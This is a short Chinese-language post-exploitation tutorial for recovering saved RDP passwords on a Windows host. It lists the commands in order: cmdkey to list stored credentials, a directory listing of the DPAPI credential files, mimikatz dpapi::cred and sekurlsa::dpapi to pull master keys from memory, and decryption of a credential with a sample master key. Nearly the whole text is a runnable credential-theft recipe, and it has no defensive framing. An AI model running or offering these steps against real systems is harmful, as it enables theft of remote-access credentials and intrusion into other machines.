本地rdp密码读取

查看当前服务器历史记录

#查看rdp连接历史记录
cmdkey /list

查找保存在本地的认证,得到对应路径以及值

dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*

得到:

C:\Users\mumsec\AppData\Local\Microsoft\Credentials\63AF4B4A2D14E2B26DDC6DF92DC889CA

运行mimikaz,获取guidMasterKey

mimikatz 
dpapi::cred /in:C:\Users\mumsec\AppData\Local\Microsoft\Credentials\63AF4B4A2D14E2B26DDC6DF92DC889CA

接下来需要使用的是guidMasterKey、pbData数据。pbData是凭据的加密数据,guidMasterKey是凭据的GUID。

获取MasterKey

根据目标凭据GUID找到其关联的MasterKey,这个MasterKey就是加密凭据的密钥,即解密pbData所必须的东西。

mimikatz.exe ""privilege::debug"" ""sekurlsa::dpapi full"" exit >> c:\log.txt

根据guidMasterKey找到对应的masterkey

masterkey

e4a0b40d5753f1935d7dc451b7e080ca3e9b4fbb60d17fc5a574da475fcf561ee813796670e396b1e9ebe8c40a2ff185cc79272ce93fb159e431add950e4b7b9

mimikatz破解密码

dpapi::cred /in:C:\Users\mumsec\AppData\Local\Microsoft\Credentials\63AF4B4A2D14E2B26DDC6DF92DC889CA /masterkey:e4a0b40d5753f1935d7dc451b7e080ca3e9b4fbb60d17fc5a574da475fcf561ee813796670e396b1e9ebe8c40a2ff185cc79272ce93fb159e431add950e4b7b9